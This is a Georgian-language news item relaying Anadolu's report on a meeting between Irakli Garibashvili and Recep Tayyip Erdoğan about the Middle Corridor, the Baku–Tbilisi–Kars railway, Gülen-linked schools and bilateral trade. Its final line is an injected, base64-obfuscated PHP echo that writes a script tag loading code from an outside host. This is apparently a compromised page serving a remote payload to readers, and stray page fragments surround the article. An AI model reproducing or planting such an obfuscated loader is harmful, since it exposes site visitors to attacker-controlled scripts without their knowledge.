celsiusi
ავერსი საქკაბელი

 თურქეთის სახელმწიფო სააგენტო „ანადოლუ“ საქართველოს პრემიერ-მინისტრის, ირაკლი ღარიბაშვილისა და თურქეთის პრეზიდენტის, რეჯეფ თაიფ ერდოღანის შეხვედრის შესახებ ინფორმაციას ავრცელებს.

როგორ ინფორმაციაშია აღნიშნული, მხარეებმა ისაუბრეს შუა დერეფნის მნიშვნელობაზე.

„თურქეთის პრეზიდენტმა ხაზი გაუსვა ბაქო-თბილისი-ყარსის რკინიგზის სწრაფად ამოქმედების პრიორიტეტულობას”, – წერს თურქული მედია.

თურქეთის საგარეო საქმეთა სამინისტროს ცნობით, ტრანსკასპიური აღმოსავლეთ-დასავლეთის დერეფნის ინიციატივა, რომელიც ცნობილია „შუა დერეფნის“ სახელწოდებით, მოიცავს თურქეთს, საქართველოს, აზერბაიჯანს და კასპიის ზღვის გავლით ცენტრალურ აზიასა და ჩინეთს უკავშირდება.

უწყების ცნობით, „შუა დერეფანი“ არის ერთ-ერთი უმნიშვნელოვანესი კომპონენტი უძველესი აბრეშუმის გზის აღდგენისკენ მიმართულ ძალისხმევაში.

ამასთან, როგორც „ანადოლუ“ წერს, ირაკლი ღარიბაშვილთან შეხვედრაზე რეჯეფ თაიფ ერდოღანმა მადლობა გადაუხადა საქართველოს თებერვალში დამანგრეველი მიწისძვრისას გაწეული დახმარებისთვის.

„ერდოღანმა ასევე ხაზი გაუსვა საქართველოში ფეტჰულა გიულენის ორგანიზაციის მიერ მართული სკოლების დახურვის და მათი ანგარიშების გაყინვის მნიშვნელობას და აღნიშნა საქართველოს მთავრობის მიერ ამ მიმართულებით გადადგმული ნაბიჯები”, – ნათქვამია თურქეთის პრეზიდენტის ადმინისტრაციის განცხადებაში, რომელსაც „ანადოლუ“ ავრცელებს.

თურქული მედიის ცნობით, ლიდერებმა ასევე ისაუბრეს თურქეთსა და საქართველოს შორის ვაჭრობის მოცულობის სამი მილიარდი დოლარიდან ხუთ მილიარდ დოლარამდე გაზრდის მნიშვნელობაზე.

354
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");